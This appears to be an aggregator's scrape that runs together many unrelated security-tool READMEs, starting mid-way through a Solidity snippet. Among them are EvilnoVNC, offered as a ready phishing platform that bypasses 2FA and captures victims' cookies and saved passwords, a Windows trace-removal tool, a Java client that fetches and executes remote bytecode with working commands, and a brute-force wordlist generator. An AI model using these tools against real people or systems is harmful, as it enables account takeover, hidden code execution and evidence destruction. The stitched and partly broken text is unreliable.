(ITodo memory request) = abi.decode(payload, (ITodo));
return this.addTodo(request);
}
}</ code>
Ethereum proposal is draft now, but the protocol has referance implementation Todo.sol.
You can test the HSTP and try on remix now.
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.0;
import "hstp/HSTP.sol";
// Stateless Hyper Service Transfer Protocol for on-chain services.
contract Todo is HSTP("Todo") {
struct TodoRequest {
string todo;
}
function addTodo(TodoRequest memory request) public payable returns(Response memory response) {
response.body = request.todo;
return response;
}
// Override for HSTP.
function query(bytes memory payload)
public
view
virtual
override
returns (Response memory) {}
function mutation(bytes memory payload)
public
payable
virtual
override
returns (Response memory) {
(TodoRequest memory todoRequest) = abi.decode(payload, (TodoRequest));
return this.addTodo(tod oRequest);
}
}
GNU GENERAL PUBLIC LICENSE V3
EvilnoVNC is a Ready to go Phishing Platform.
Unlike other phishing techniques, EvilnoVNC allows 2FA bypassing by using a real browser over a noVNC connection.
In addition, this tool allows us to see in real time all of the victim's actions, access to their downloaded files and the entire browser profile, including cookies, saved passwords, browsing history and much more.
It's recommended to clone the complete repository or download the zip file.
Additionally, it's necessary to build Docker manually. You can do this by running the following commands:
git clone https://github.com/JoelGMSec/EvilnoVNC
cd EvilnoVNC ; sudo chown -R 103 Downloads
sudo docker build -t joelgmsec/evilnovnc .
./start.sh -h
_____ _ _ __ ___ _ ____
| ____|_ _(_) |_ __ __\ \ / / \ | |/ ___|
| _| \ \ / / | | '_ \ / _ \ \ / /| \| | |
| |___ \ V /| | | | | | (_) \ V / | |\ | |___
|_____| \_/ |_|_|_| |_|\___/ \_/ |_| \_|\____|
---------------- by @JoelGMSec --------------
Usage: ./start.sh $resolution $url
Examples:
1280x720 16bits: ./start.sh 1280x720x16 http://example.com
1280x720 24bits: ./start.sh 1280x720x24 http://example.com
1920x1080 16bits: ./start.sh 1920x1080x16 http://example.com
1920x1080 24bits: ./start.sh 1920x1080x24 http://example.com
https://darkbyte.net/robando-sesiones-y-bypasseando-2fa-con-evilnovnc
This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.
Original idea by @mrd0x: https://mrd0x.com/bypass-2fa-using-novnc
This tool has been created and designed from scratch by Joel Gámez Molina // @JoelGMSec
This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.
For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.
AoratosWin is a tool that removes traces of executed applications on Windows OS which can easily be listed with tools such as ExecutedProgramList by Nirsoft.
(Feel free to decompile, reverse, redistribute, etc.)
Any actions and/or activities related to this tool is solely your responsibility.
CloudFox helps you gain situational awareness in unfamiliar cloud environments. It’s an open source command line tool created to help penetration testers and other offensive security professionals find exploitable attack paths in cloud infrastructure.
CloudFox is modular (you can run one command at a time), but there is an aws all-checks
command that will run the other aws commands for you with sane defaults:
cloudfox aws --profile [profile-name] all-checks
CloudFox is designed to be executed by a principal with limited read-only permissions, but it's purpose is to help you find attack paths that can be exploited in simulated compromise scenarios (aka, objective based penetration testing).
For the full documentation please refer to our wiki.
Provider | CloudFox Commands |
---|---|
AWS | 15 |
Azure | 2 (alpha) |
GCP | Support Planned |
Kubernetes | Support Planned |
Option 1: Download the latest binary release for your platform.
Option 2: Install Go, clone the CloudFox repository and compile from source
# git clone https://github.com/BishopFox/cloudfox.git
...omitted for brevity...
# cd ./cloudfox
# go build .
# ./cloudfox
SecurityAudit
+ CloudFox custom policy
Additional policy notes (as of 09/2022):
Policy | Notes |
---|---|
CloudFox custom policy | Has a complete list of every permission cloudfox uses and nothing else |
arn:aws:iam::aws:policy/SecurityAudit | Covers most cloudfox checks but is missing newer services or permissions like apprunner:*, grafana:*, lambda:GetFunctionURL, lightsail:GetContainerServices |
arn:aws:iam::aws:policy/job-function/ViewOnlyAccess | Covers most cloudfox checks but is missing newer services or permissions like AppRunner:*, grafana:*, lambda:GetFunctionURL, lightsail:GetContainerServices - and is also missing iam:SimulatePrincipalPolicy. |
arn:aws:iam::aws:policy/ReadOnlyAccess | Only missing AppRunner, but also grants things like "s3:Get*" which can be overly permissive. |
arn:aws:iam::aws:policy/AdministratorAccess | This will work just fine with CloudFox, but if you were handed this level of access as a penetration tester, that should probably be a finding in itself :) |
Provider | Command Name | Description |
---|---|---|
AWS | all-checks | Run all of the other commands using reasonable defaults. You'll still want to check out the non-default options of each command, but this is a great place to start. |
AWS | access-keys | Lists active access keys for all users. Useful for cross referencing a key you found with which in-scope account it belongs to. |
AWS | buckets | Lists the buckets in the account and gives you handy commands for inspecting them further. |
AWS | ecr | List the most recently pushed image URI from all repositories. Use the loot file to pull selected images down with docker/nerdctl for inspection. |
AWS | endpoints | Enumerates endpoints from various services. Scan these endpoints from both an internal and external position to look for things that don't require authentication, are misconfigured, etc. |
AWS | env-vars | Grabs the environment variables from services that have them (App Runner, ECS, Lambda, Lightsail containers, Sagemaker are supported. If you find a sensitive secret, use cloudfox iam-simulator AND pmapper to see who has access to them. |
AWS | filesystems | Enumerate the EFS and FSx filesystems that you might be able to mount without creds (if you have the right network access). For example, this is useful when you have ec:RunInstance but not iam:PassRole . |
AWS | iam-simulator | Like pmapper, but uses the IAM policy simulator. It uses AWS's evaluation logic, but notably, it doesn't consider transitive access via privesc, which is why you should also always also use pmapper. |
AWS | instances | Enumerates useful information for EC2 Instances in all regions like name, public/private IPs, and instance profiles. Generates loot files you can feed to nmap and other tools for service enumeration. |
AWS | inventory | Gain a rough understanding of size of the account and preferred regions. |
AWS | outbound-assumed-roles | List the roles that have been assumed by principals in this account. This is an excellent way to find outbound attack paths that lead into other accounts. |
AWS | permissions | Enumerates IAM permissions associated with all users and roles. Grep this output to figure out what permissions a particular principal has rather than logging into the AWS console and painstakingly expanding each policy attached to the principal you are investigating. |
AWS | principals | Enumerates IAM users and Roles so you have the data at your fingertips. |
AWS | role-trusts | Enumerates IAM role trust policies so you can look for overly permissive role trusts or find roles that trust a specific service. |
AWS | route53 | Enumerate all records from all route53 managed zones. Use this for application and service enumeration. |
AWS | secrets | List secrets from SecretsManager and SSM. Look for interesting secrets in the list and then see who has access to them using use cloudfox iam-simulator and/or pmapper . |
Azure | instances-map | Enumerates useful information for Compute instances in all available resource groups and subscriptions |
Azure | rbac-map | Enumerates Role Assignments for all tenants |
How does CloudFox compare with ScoutSuite, Prowler, Steampipe's AWS Compliance Module, AWS Security Hub, etc.
CloudFox doesn't create any alerts or findings, and doesn't check your environment for compliance to a baseline or benchmark. Instead, it simply enables you to be more efficient during your manual penetration testing activities. If gives you the information you'll likely need to validate whether an attack path is possible or not.
Why do I see errors in some CloudFox commands?
You can always look in the ~/.cloudfox/cloudfox-error.log file to get more information on errors.
endpoints
commandendpoints
commandiam-simulator
commandpermissions
command--userdata
functionality in the instances
command, the permissions
command, and many othersinventory
command and just generally CloudFox as a wholeParrot OS 5.1 is officially released. We're proud to say that the new version of Parrot OS 5.1 is available for download; this new version includes a lot of improvements and updates that makes the distribution more performing and more secure.
You can download Parrot OS by clicking here and, as always, we invite you to never trust third part and unofficial sources.
If you need any help or in case the direct downloads don't work for you, we also provide official Torrent files, which can circumvent firewalls and network restrictions in most cases.
First of all, we always suggest to update your version for being sure that is stable and functional. You can upgrade an existing system via APT using one of the following commands:
sudo parrot-upgrade
or
sudo apt update && sudo apt full-upgrade
Even if we recommend to always update your version, it is also recommended to do a backup and re-install the latest version to have a cleaner and more reliable user experience, especially if you upgrade from a very old version of parrot.
You can find all the infos about the new Kernel 5.18 by clickig on this link.
Our docker offering has been revamped! We now provide our dedicated parrot.run image registry along with the default docker.io one.
All our images are now natively multiarch, and support amd64 and arm64 architectures.
Our containers offering was updated as well, and we are committed to further improve it.
Run docker run --rm -ti --network host -v $PWD/work:/work parrot.run/core
and give our containers a try without having to install the system, or visit our Docker images page to explore the other containers we offer.
Several packages were updated and backported, like the new Golang 1.19 or Libreoffice 7.4. This is part of our commitment to provide the latest version of every most important software while choosing a stable LTS release model.
To make sure to have all the latest packages installed from our backports channel, use the following commands:
sudo apt update
sudo apt full-upgrade -t parrot-backports
The system has received important updates to some opf its key packages, like parrot-menu, which now provides additional launchers to our newly imported tools; or parrot-core, which now provides a new firefox profile with improved security hardening, plus some minor bugfixes to our zshrc configuration.
As mentioned earlier, our Firefox profile has received a major update that significantly improves the overall privacy and security.
Our bookmarks collection has been revamped, and now includes new resources, including OSINT services, new learning sources and other useful resources for hackers, developers, students and security researchers.
We have also boosted our effort to avoid Mozilla telemetry and bring DuckDuckGo back as the default search engine, while we are exploring other alternatives for the future.
Most of our tools have received major version updates, especially our reverse engineering tools, like rizin and rizin-cutter.
Important updates involved metasploit, exploitdb and other popular tools as well.
The new AnonSurf 4 represents a major upgrade for our popular anonymity tool.
Anonsurf is our in-house anonymity solution that routes all the system traffic through TOR automatically without having to set up proxy settings for each individua program, and preventing traffic leaking in most cases.
The new version provides significant fixes and reliability updates, fully supports debian systems without the old resolvconf setup, has a new user interface with improved system tray icon and settings dialog window, and offers a better overall user experience.
Our IoT version now implements significant performance improvements for the various Raspberry Pi boards, and finally includes Wi-Fi support for the Raspberry Pi 400 board.
The Parrot IoT offering has also been expanded, and it now offers Home and Security editions as well, with a full MATE desktop environment exactly like the desktop counterpart.
Our popular Architect Edition now implements some minor bugfixes and is more reliable than ever.
The Architect Edition is a special edition of Parrot that enables the user to install a barebone Parrot Core system, and then offers a selection of additional modules to further customize the system.
You can use Parrot Architect to install other desktop environments like KDE, GNOME or XFCE, or to install a specific selection of tools.
The Architect Edition is also used internally by the Parrot Engineering Team to install Parrot Server Edition on all the servers that power our infrastructure, which is officially 100% powered by Parrot and Kubernetes.
This is a major change in the way we handle our infrastructure, which enables us to implement better autoscaling, easier management, smaller attack surface and an overall better network, with the improved scalability and security we were looking for.
Arsenal is a Simple shell script (Bash) used to install the most important tools and requirements for your environment and save time in installing all these tools.
Name | description |
---|---|
Amass | The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques |
ffuf | A fast web fuzzer written in Go |
dnsX | Fast and multi-purpose DNS toolkit allow to run multiple DNS queries |
meg | meg is a tool for fetching lots of URLs but still being 'nice' to servers |
gf | A wrapper around grep to avoid typing common patterns |
XnLinkFinder | This is a tool used to discover endpoints crawling a target |
httpX | httpx is a fast and multi-purpose HTTP toolkit allow to run multiple probers using retryablehttp library, it is designed to maintain the result reliability with increased threads |
Gobuster | Gobuster is a tool used to brute-force (DNS,Open Amazon S3 buckets,Web Content) |
Nuclei | Nuclei tool is Golang Language-based tool used to send requests across multiple targets based on nuclei templates leading to zero false positive or irrelevant results and provides fast scanning on various host |
Subfinder | Subfinder is a subdomain discovery tool that discovers valid subdomains for websites by using passive online sources. It has a simple modular architecture and is optimized for speed. subfinder is built for doing one thing only - passive subdomain enumeration, and it does that very well |
Naabu | Naabu is a port scanning tool written in Go that allows you to enumerate valid ports for hosts in a fast and reliable manner. It is a really simple tool that does fast SYN/CONNECT scans on the host/list of hosts and lists all ports that return a reply |
assetfinder | Find domains and subdomains potentially related to a given domain |
httprobe | Take a list of domains and probe for working http and https servers |
knockpy | Knockpy is a python3 tool designed to quickly enumerate subdomains on a target domain through dictionary attack |
waybackurl | fetch known URLs from the Wayback Machine for *.domain and output them on stdout |
Logsensor | A Powerful Sensor Tool to discover login panels, and POST Form SQLi Scanning |
Subzy | Subdomain takeover tool which works based on matching response fingerprints from can-i-take-over-xyz |
Xss-strike | Advanced XSS Detection Suite |
Altdns | Subdomain discovery through alterations and permutations |
Nosqlmap | NoSQLMap is an open source Python tool designed to audit for as well as automate injection attacks and exploit default configuration weaknesses in NoSQL databases and web applications using NoSQL in order to disclose or clone data from the database |
ParamSpider | Parameter miner for humans |
GoSpider | GoSpider - Fast web spider written in Go |
eyewitness | EyeWitness is a Python tool written by @CptJesus and @christruncer. It’s goal is to help you efficiently assess what assets of your target to look into first. |
CRLFuzz | A fast tool to scan CRLF vulnerability written in Go |
DontGO403 | dontgo403 is a tool to bypass 40X errors |
Chameleon | Chameleon provides better content discovery by using wappalyzer's set of technology fingerprints alongside custom wordlists tailored to each detected technologies |
uncover | uncover is a go wrapper using APIs of well known search engines to quickly discover exposed hosts on the internet. It is built with automation in mind, so you can query it and utilize the results with your current pipeline tools |
wpscan | WordPress Security Scanner |
sudo apt-get remove -y golang-go
sudo rm -rf /usr/local/go
wget https://go.dev/dl/go1.19.1.linux-amd64.tar.gz
sudo tar -xvf go1.19.1.linux-amd64.tar.gz
sudo mv go /usr/local
nano /etc/profile or .profile
export GOPATH=$HOME/go
export PATH=$PATH:/usr/local/go/bin
export PATH=$PATH:$GOPATH/bin
source /etc/profile #to update you shell dont worry
git clone https://github.com/Micro0x00/Arsenal.git
cd Arsenal
sudo chmod +x Arsenal.sh
sudo ./Arsenal.sh
Erlik 2 - Vulnerable-Flask-App
Tested - Kali 2022.1
It is a vulnerable Flask Web App. It is a lab environment created for people who want to improve themselves in the field of web penetration testing.
It contains the following vulnerabilities.
git clone https://github.com/anil-yelken/Vulnerable-Flask-App
cd Vulnerable-Flask-App
sudo pip3 install -r requirements.txt
python3 vulnerable-flask-app.py
https://twitter.com/anilyelken06
https://medium.com/@anilyelken
Today, with the spread of information technology systems, investments in the field of cyber security have increased to a great extent. Vulnerability management, penetration tests and various analyzes are carried out to accurately determine how much our institutions can be affected by cyber threats. With Tenable Nessus, the industry leader in vulnerability management tools, an IP address that has just joined the corporate network, a newly opened port, exploitable vulnerabilities can be determined, and a python application that can work integrated with Tenable Nessus has been developed to automatically identify these processes.
git clone https://github.com/anil-yelken/Nessus-Automation cd Nessus-Automation sudo pip3 install requirements.txt
The SIEM IP address in the codes should be changed.
In order to detect a new IP address exactly, it was checked whether the phrase "Host Discovery" was used in the Nessus scan name, and the live IP addresses were recorded in the database with a timestamp, and the difference IP address was sent to SIEM. The contents of the hosts table were as follows:
Usage: python finding-new-ip-nessus.py
By checking the port scans made by Nessus, the port-IP-time stamp information is recorded in the database, it detects a newly opened service over the database and transmits the data to SIEM in the form of "New Port:" port-IP-time stamp. The result observed by SIEM is as follows:
Usage: python finding-new-port-nessus.py
In the findings of vulnerability scans made in institutions and organizations, primarily exploitable vulnerabilities should be closed. At the same time, it records the vulnerabilities in the database that can be exploited with metasploit in the institutions and transmits this information to SIEM when it finds a different exploitable vulnerability on the systems. Exploitable vulnerabilities observed by SIEM:
Usage: python finding-exploitable-service-nessus.py
https://twitter.com/anilyelken06
https://medium.com/@anilyelken
This tool allows you to send Java bytecode in the form of class files to your clients (or potential targets) to load and execute using Java ClassLoader together with Reflect API. The client receives the class file from the server and return the respective execution output. Payloads must be written in Java and compiled before starting the server.
Tool has been tested using OpenJDK 11 with JRE Java Package, both on Windows and Linux (zip portable version). Java version should be 11 or higher due to dependencies.
https://www.openlogic.com/openjdk-downloads
$ java -jar java-class-loader.jar -help
usage: Main
-address <arg> address to connect (client) / to bind (server)
-classfile <arg> filename of bytecode .class file to load remotely
(default: Payload.class)
-classmethod <arg> name of method to invoke (default: exec)
-classname <arg> name of class (default: Payload)
-client run as client
-help print this message
-keepalive keeps the client getting classfile from server every
X seconds (default: 3 seconds)
-key <arg> secret key - 256 bits in base64 format (if not
specified it will generate a new one)
-port <arg> port to connect (client) / to bind (server)
-server run as server
Assuming you have the following Hello World payload in the Payload.java
file:
//Payload.java
public class Payload {
public static String exec() {
String output = "";
try {
output = "Hello world from client!";
} catch (Exception e) {
e.printStackTrace();
}
return output;
}
}
Then you should compile and produce the respective Payload.class
file.
To run the server process listening on port 1337 on all net interfaces:
$ java -jar java-class-loader.jar -server -address 0.0.0.0 -port 1337 -classfile Payload.class
Running as server
Server running on 0.0.0.0:1337
Generated new key: TOU3TLn1QsayL1K6tbNOzDK69MstouEyNLMGqzqNIrQ=
On the client side, you may use the same JAR package with the -client
flag and use the symmetric key generated by server. Specify the server IP address and port to connect to. You may also change the class name and class method (defaults are Payload
and String exec()
respectively). Additionally, you can specify -keepalive
to keep the client requesting class file from server while maintaining the connection.
$ java -jar java-class-loader.jar -client -address 192.168.1.73 -port 1337 -key TOU3TLn1QsayL1K6tbNOzDK69MstouEyNLMGqzqNIrQ=
Running as client
Connecting to 192.168.1.73:1337
Received 593 bytes from server
Output from invoked class method: Hello world from client!
Sent 24 bytes to server
Refer to https://vrls.ws/posts/2022/08/building-a-remote-class-loader-in-java/ for a blog post related with the development of this tool.
https://www.sangfor.com/blog/cybersecurity/behinder-v30-analysis
https://medium.com/@m01e/jsp-webshell-cookbook-part-1-6836844ceee7
https://venishjoe.net/post/dynamically-load-compiled-java-class/
https://users.cs.jmu.edu/bernstdh/web/common/lectures/slides_class-loaders_remote.php
https://www.javainterviewpoint.com/chacha20-poly1305-encryption-and-decryption/
https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/ClassLoader.html
https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/reflect/Method.html
WarDriving is the act of navigating, on foot or by car, to discover wireless networks in the surrounding area.
Wardriving is done by combining the SSID information obtained with scapy using the HTML5 geolocation feature.
I cannot be held responsible for the malicious use of the vehicle.
ssidBul.py has been tested via TP-LINK TL WN722N.
Selenium 3.11.0 and Firefox 59.0.2 are used for location.py. Firefox geckodriver is located in the directory where the codes are.
SSID and MAC names and location information were created and changed in the test environment.
ssidBul.py and location.py must be run concurrently.
ssidBul.py result:
20 March 2018 11:48PM|9c:b2:b2:11:12:13|ECFJ3M
20 March 2018 11:48PM|c0:25:e9:11:12:13|T7068
Here is a screenshot of allowing location information while running location.py:
The screenshot of the location information is as follows:
konum.py result:
lat=38.8333635|lon=34.759741899|20 March 2018 11:47PM
lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM
lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM
lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM
lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM
lat=38.8333635|lon=34.759741899|20 March 2018 11:49PM
lat=38.8333635|lon=34.759741899|20 March 2018 11:49PM
After the data collection processes, the following output is obtained as a result of running wardriving.py:
lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM|9c:b2:b2:11:12:13|ECFJ3M
lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM|c0:25:e9:11:12:13|T7068
https://twitter.com/anilyelken06
https://medium.com/@anilyelken
Dead link (broken link) means a link within a web page that cannot be connected. These links can have a negative impact to SEO and Security. This tool makes it easy to identify and modify.
Install with Gem
gem install deadfinder
Docker Image
docker pull ghcr.io/hahwul/deadfinder:latest
Commands:
deadfinder file # Scan the URLs from File. (e.g deadfinder file urls.txt)
deadfinder help [COMMAND] # Describe available commands or one specific command
deadfinder pipe # Scan the URLs from STDIN. (e.g cat urls.txt | deadfinder pipe)
deadfinder sitemap # Scan the URLs from sitemap.
deadfinder url # Scan the Single URL.
deadfinder version # Show version.
Options:
c, [--concurrency=N] # Set Concurrncy
# Default: 20
t, [--timeout=N] # Set HTTP Timeout
# Default: 10
o, [--output=OUTPUT] # Save JSON Result
# Scan the URLs from STDIN (multiple URLs)
cat urls.txt | deadfinder pipe
# Scan the URLs from File. (multiple URLs)
deadfinder file urls.txt
# Scan the Single URL.
deadfinder url https://www.hahwul.com
# Scan the URLs from sitemap. (multiple URLs)
deadfinder sitemap https://www.hahwul.com/sitemap.xml
deadfinder sitemap https://www.hahwul.com/sitemap.xml \
-o output.json
cat output.json | jq
Store and retrieve your passwords from a secure offline database. Check if your passwords has leaked previously to prevent targeted password reuse attacks.
Pmanager depends on "pkg-config" and "libssl-dev" packages on ubuntu. Simply install them with
sudo apt install pkg-config libssl-dev -y
Download the binary file according to your current OS from releases, and add the binary location to PATH environment variable and you are good to go.
sudo apt update -y && sudo apt install curl
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
sudo apt install build-essential -y
sudo apt install pkg-config libssl-dev git -y
git clone https://github.com/yukselberkay/pmanager
cd pmanager
make install
git clone https://github.com/yukselberkay/pmanager
cd pmanager
cargo build --release
I have not been able to test pmanager on a Mac system. But you should be able to build it from the source ("cargo build --release"). since there are no OS specific functionality.
Firstly the database needs to be initialized using "init" command.
# Initializes the database in the home directory.
pmanager init --db-path ~
# Insert a new user and password pair to the database.
pmanager insert --domain github.com
# Get a specific record by domain.
pmanager get --domain github.com
# List every record in the database.
pmanager list
# Update a record by domain.
pmanager update --domain github.com
# Deletes a record associated with domain from the database.
pmanager delete github.com
# Check if a password in your database is leaked before.
pmanager leaked --domain github.com
pmanager 1.0.0
USAGE:
pmanager [OPTIONS] [SUBCOMMAND]
OPTIONS:
-d, --debug
-h, --help Print help information
-V, --version Print version information
SUBCOMMANDS:
delete Delete a key value pair from database
get Get value by domain from database
help Print this message or the help of the given subcommand(s)
init Initialize pmanager
insert Insert a user password pair associated with a domain to database
leaked Check if a password associated with your domain is leaked. This option uses
xposedornot api. This check achieved by hashing specified domain's password and
sending the first 10 hexade cimal characters to xposedornot service
list Lists every record in the database
update Update a record from database
Bitcoin Address -> bc1qrmcmgasuz78d0g09rllh9upurnjwzpn07vmmyj
SpyCast is a crossplatform mDNS enumeration tool that can work either in active mode by recursively querying services, or in passive mode by only listening to multicast packets.
cargo build --release
OS specific bundle packages (for example dmg and app bundles on OSX) can be built via:
cargo tauri build
SpyCast can also be built without the default UI, in which case all output will be printed on the terminal:
cargo build --no-default-features --release
Run SpyCast in active mode (it will recursively query all available mDNS services):
./target/release/spycast
Run in passive mode (it won't produce any mDNS traffic and only listen for multicast packets):
./target/release/spycast --passive
Run spycast --help
for the complete list of options.
This project is made with ♥ by @evilsocket and it is released under the GPL3 license.
psudohash is a password list generator for orchestrating brute force attacks. It imitates certain password creation patterns commonly used by humans, like substituting a word's letters with symbols or numbers, using char-case variations, adding a common padding before or after the word and more. It is keyword-based and highly customizable.
System administrators and other employees often use a mutated version of the Company's name to set passwords (e.g. Am@z0n_2022). This is commonly the case for network devices (Wi-Fi access points, switches, routers, etc), application or even domain accounts. With the most basic options, psudohash can generate a wordlist with all possible mutations of one or multiple keywords, based on common character substitution patterns (customizable), case variations, strings commonly used as padding and more. Take a look at the following example:
The script includes a basic character substitution schema. You can add/modify character substitution patterns by editing the source and following the data structure logic presented below (default):
transformations = [
{'a' : '@'},
{'b' : '8'},
{'e' : '3'},
{'g' : ['9', '6']},
{'i' : ['1', '!']},
{'o' : '0'},
{'s' : ['$', '5']},
{'t' : '7'}
]
When it comes to people, i think we all have (more or less) set passwords using a mutation of one or more words that mean something to us e.g., our name or wife/kid/pet/band names, sticking the year we were born at the end or maybe a super secure padding like "!@#". Well, guess what?
No special requirements. Just clone the repo and make the script executable:
git clone https://github.com/t3l3machus/psudohash
cd ./psudohash
chmod +x psudohash.py
./psudohash.py [-h] -w WORDS [-an LEVEL] [-nl LIMIT] [-y YEARS] [-ap VALUES] [-cpb] [-cpa] [-cpo] [-o FILENAME] [-q]
The help dialog [ -h, --help ] includes usage details and examples.
--years
and --append-numbering
with a --numbering-limit
≥ last two digits of any year input, will most likely produce duplicate words because of the mutation patterns implemented by the tool.I'm gathering information regarding commonly used password creation patterns to enhance the tool's capabilities.
export PPSSWWDD=yourRootPswd
More references: config/doNmapScan.sh By default, naabu is used to complete port scanning -stats=true to view the scanning progress Can I not scan ports?
noScan=true ./scan4all -l list.txt -v
# nmap result default noScan=true
./scan4all -l nmapRssuilt.xml -v
TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
---|---|---|---|---|---|---|---|---|---|
cve | 1294 | daffainfo | 605 | cves | 1277 | info | 1352 | http | 3554 |
panel | 591 | dhiyaneshdk | 503 | exposed-panels | 600 | high | 938 | file | 76 |
lfi | 486 | pikpikcu | 321 | vulnerabilities | 493 | medium | 766 | network | 50 |
xss | 439 | pdteam | 269 | technologies | 266 | critical | 436 | dns | 17 |
wordpress | 401 | geeknik | 187 | exposures | 254 | low | 211 | ||
exposure | 355 | dwisiswant0 | 169 | misconfiguration | 207 | unknown | 7 | ||
cve2021 | 322 | 0x_akoko | 154 | token-spray | 206 | ||||
rce | 313 | princechaddha | 147 | workflows | 187 | ||||
wp-plugin | 297 | pussycat0x | 128 | default-logins | 101 | ||||
tech | 282 | gy741 | 126 | file | 76 |
281 directories, 3922 files.
Support 7000+ web fingerprint scanning, identification:
Support 146 protocols and 90000+ rule port scanning
Fast HTTP sensitive file detection, can customize dictionary
Landing page detection
Supports multiple types of input - STDIN/HOST/IP/CIDR/URL/TXT
Supports multiple output types - JSON/TXT/CSV/STDOUT
Highly integratable: Configurable unified storage of results to Elasticsearch [strongly recommended]
Smart SSL Analysis:
Automatically identify the case of multiple IPs associated with a domain (DNS), and automatically scan the associated multiple IPs
Smart processing:
Automated supply chain identification, analysis and scanning
Link python3 log4j-scan
mkdir ~/MyWork/;cd ~/MyWork/;git clone https://github.com/hktalent/log4j-scan
Intelligently identify honeypots and skip targets. This function is disabled by default. You can set EnableHoneyportDetection=true to enable
Highly customizable: allow to define your own dictionary through config/config.json configuration, or control more details, including but not limited to: nuclei, httpx, naabu, etc.
support HTTP Request Smuggling: CL-TE、TE-CL、TE-TE、CL_CL、BaseErr
Support via parameter Cookie='PHPSession=xxxx' ./scan4all -host xxxx.com, compatible with nuclei, httpx, go-poc, x-ray POC, filefuzz, http Smuggling
download from Releases
go install github.com/hktalent/scan4all@2.6.9
scan4all -h
mkdir -p logs data
docker run --restart=always --ulimit nofile=65536:65536 -p 9200:9200 -p 9300:9300 -d --name es -v $PWD/logs:/usr/share/elasticsearch/logs -v $PWD /config/elasticsearch.yml:/usr/share/elasticsearch/config/elasticsearch.yml -v $PWD/config/jvm.options:/usr/share/elasticsearch/config/jvm.options -v $PWD/data:/ usr/share/elasticsearch/data hktalent/elasticsearch:7.16.2
# Initialize the es index, the result structure of each tool is different, and it is stored separately
./config/initEs.sh
# Search syntax, more query methods, learn Elasticsearch by yourself
http://127.0.0.1:9200/nmap_index/_doc/_search?q=_id:192.168.0.111
where 92.168.0.111 is the target to query
go build
# Precise scan url list UrlPrecise=true
UrlPrecise=true ./scan4all -l xx.txt
# Disable adaptation to nmap and use naabu port to scan its internally defined http-related ports
priorityNmap=false ./scan4all -tp http -list allOut.txt -v
more see: discussions
Unoffical Flipper Zero cli wrapper written in Python
$ git clone https://github.com/wh00hw/pyFlipper.git
$ cd pyFlipper
$ python3 -m venv venv
$ source venv/bin/activate
$ pip install -r requirements.txt
from pyflipper import PyFlipper
#Local serial port
flipper = PyFlipper(com="/dev/ttyACM0")
#OR
#Remote serial2websocket server
flipper = PyFlipper(ws="ws://192.168.1.5:1337")
#Info
info = flipper.power.info()
#Poweroff
flipper.power.off()
#Reboot
flipper.power.reboot()
#Reboot in DFU mode
flipper.power.reboot2dfu()
#Install update from .fuf file
flipper.update.install(fuf_file="/ext/update.fuf")
#Backup Flipper to .tar file
flipper.update.backup(dest_tar_file="/ext/backup.tar")
#Restore Flipper from backup .tar file
flipper.update.restore(bak_tar_file="/ext/backup.tar")
#List installed apps
apps = flipper.loader.list()
#Open app
flipper.loader.open(app_name="Clock")
#Get flipper date
date = flipper.date.date()
#Get flipper timestamp
timestamp = flipper.date.timestamp()
#Get the processes dict list
ps = flipper.ps.list()
#Get device info dict
device_info = flipper.device_info.info()
#Get heap info dict
heap = flipper.free.info()
#Get free_blocks string
free_blocks = flipper.free.blocks()
#Get bluetooth info
bt_info = flipper.bt.info()
#Get the storage filesystem info
ext_info = flipper.storage.info(fs="/ext")
#Get the storage /ext dict
ext_list = flipper.storage.list(path="/ext")
#Get the storage /ext tree dict
ext_tree = flipper.storage.tree(path="/ext")
#Get file info
file_info = flipper.storage.stat(file="/ext/foo/bar.txt")
#Make directory
flipper.storage.mkdir(new_dir="/ext/foo")
#Read file
plain_text = flipper.storage.read(file="/ext/foo/bar.txt")
#Remove file
flipper.storage.remove(file="/ext/foo/bar.txt")
#Copy file
flipper.storage.copy(src="/ext/foo/source.txt", dest="/ext/bar/destination.txt")
#Rename file
flipper.storage.rename(file="/ext/foo/bar.txt", new_file="/ext/foo/rab.txt")
#MD5 Hash file
md5_hash = flipper.storage.md5(file="/ext/foo/bar.txt")
#Write file in one chunk
file = "/ext/bar.txt"
text = """There are many variations of passages of Lorem Ipsum available,
but the majority have suffered alteration in some form, by injected humour,
or randomised words which don't look even slightly believable.
If you are going to use a passage of Lorem Ipsum,
you need to be sure there isn't anything embarrassing hidden in the middle of text.
"""
flipper.storage.write.file(file, text)
#Write file using a listener
file = "/ext/foo.txt"
text_one = """There are many variations of passages of Lorem Ipsum available,
but the majority have suffered alteration in some form, by injected humour,
or randomised words which don't look even slightly believable.
If you are going to use a passage of Lorem Ipsum,
you need to be sure there isn't anything embarrassing hidden in the middle of text.
"""
flipper.storage.write.start(file)
time.sleep(2)
flipper.storage.write.send(text_one)
text_two = """All the Lorem Ipsum generators on the Internet tend to repeat predefined chunks as
necessary, making this the first true generator on the Internet.
It uses a dictionary of over 200 Latin words, combined with a handful of
model sentence structures, to generate Lorem Ipsum which looks reasonable.
The generated Lorem Ipsum is therefore always free from repetition, injected humour, or non-characteristic words etc.
"""
flipper.storage.write.send(text_two)
time.sleep(3)
#Don't forget to stop
flipper.storage.write.stop()
#Set generic led on (r,b,g,bl)
flipper.led.set(led='r', value=255)
#Set blue led off
flipper.led.blue(value=0)
#Set green led value
flipper.led.green(value=175)
#Set backlight on
flipper.led.backlight_on()
#Set backlight off
flipper.led.backlight_off()
#Turn off led
flipper.led.off()
#Set vibro True or False
flipper.vibro.set(True)
#Set vibro on
flipper.vibro.on()
#Set vibro off
flipper.vibro.off()
#Set gpio mode: 0 - input, 1 - output
flipper.gpio.mode(pin_name=PIN_NAME, value=1)
#Read gpio pin value
